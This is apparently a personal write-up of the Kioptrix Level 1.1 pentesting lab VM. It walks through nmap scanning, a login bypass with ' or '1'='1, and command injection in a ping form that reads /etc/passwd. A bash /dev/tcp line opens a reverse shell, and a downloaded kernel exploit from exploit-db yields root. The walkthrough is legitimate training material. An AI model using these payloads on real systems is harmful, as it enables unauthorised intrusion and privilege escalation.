Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series which can be found here. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification.
Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”
Lets get started!
Kali Linux machine
Using the tool netdiscover, I found the victim VM to be 192.168.182.152
root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24
Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on port 80/tcp, Apache httpd 2.0.52 on port 443/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. It’s probable that this web server has a back-end database running SQL on it ,which might be vulnerable to an SQL injection.
root@kali:~# nmap -sS -T4 -A 192.168.182.152 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-25 14:11 CST Nmap scan report for 192.168.182.152 Host is up (0.00019s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 621/udp status |_ 100024 1 624/tcp status 443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS)) | http-cisco-anyconnect: |_ ERROR: Not a Cisco ASA or unsupported version |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-10-08T00:10:47 |_Not valid after: 2010-10-08T00:10:47 |_ssl-date: 2017-02-25T18:02:19+00:00; -2h09m45s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC2_CBC_128_CBC_WITH_MD5 |_ SSL2_RC4_128_EXPORT40_WITH_MD5 631/tcp open ipp CUPS 1.1 | http-methods: Potentially risky methods: PUT |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:5C:FF:EC (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.19 ms 192.168.182.152 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds root@kali:~#
Exploitation (SQL and Command Injection)
Browsing to the server, I found that it displays a login page. Next, I will try to perform and SQL Injection.
I tested the login form using ‘ or ‘1’=’1 and it worked.
The reason why it probably worked was because the SQL statement is along the lines of this:
SELECT * FROM users WHERE username='$username' AND password='$password'
Supplying the username and password with ‘ or ‘1’=’1 will turn the SQL statement into:
SELECT username FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'
Because ‘ or ‘1’=’1 always means true, this SELECT statement will log us in and return the first username for the user table.
So now we have a Ping command prompt which might be vulnerable to a Command Injection. Using the command
; id I found that the application was vulnerable to a command injection, so I also tried to see if I could get the usernames and passwords on the server. I was able to get the /etc/passwd file but didnt have access to /etc/shadow .
Knowing that the application is vulnerable to a command injection, I took it a step further and tried to get a reverse shell.
Used ncat to set up the listener to catch the reverse shell.
root@kali:~# nc -nvlp 443
Then went back to the console on the website and ran the following command to get the reverse shell:
; bash -i >& /dev/tcp/192.168.182.147/443 0>&1
I successfully got a reverse shell and as apache. I will next try to do privilege escalation to get the desired root account.
bash-3.00$ uname -a Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux bash-3.00$ cat /etc/*-release CentOS release 4.5 (Final) bash-3.00$
It looks like the server is running CentOS release 4.5 which after doing some research, I found it was vulnerable to the ‘ip_append_data()’ Ring0 Privilege Escalation exploit..
So on the the shell that we recently obtained, I used wget to download the exploit to the server.
bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate --16:20:14-- https://www.exploit-db.com/download/9542 => `9542' Resolving www.exploit-db.com... 220.127.116.11 Connecting to www.exploit-db.com|18.104.22.168|:443... connected. WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'. HTTP request sent, awaiting response... 200 OK Length: 2,645 (2.6K) [application/txt] 0K .. 100% 40.04 MB/s 16:20:14 (40.04 MB/s) - `9542' saved [2645/2645] bash-3.00$ ls 9542
Then I compiled the program, and ran the exploit to get root shell that we all desire.
bash-3.00$ ls 9542 bash-3.00$ mv 9542 9542.c bash-3.00$ gcc 9542.c bash-3.00$ ls -l total 12 -rw-r--r-- 1 apache apache 2645 Feb 25 16:20 9542.c -rwxr-xr-x 1 apache apache 6932 Feb 25 16:21 a.out bash-3.00$ ./a.out sh: no job control in this shell sh-3.00# id uid=0(root) gid=0(root) groups=48(apache) sh-3.00# whoami root sh-3.00# sh-3.00# hostname kioptrix.level2 sh-3.00#
Straightforward and to the point. Now on to level 3!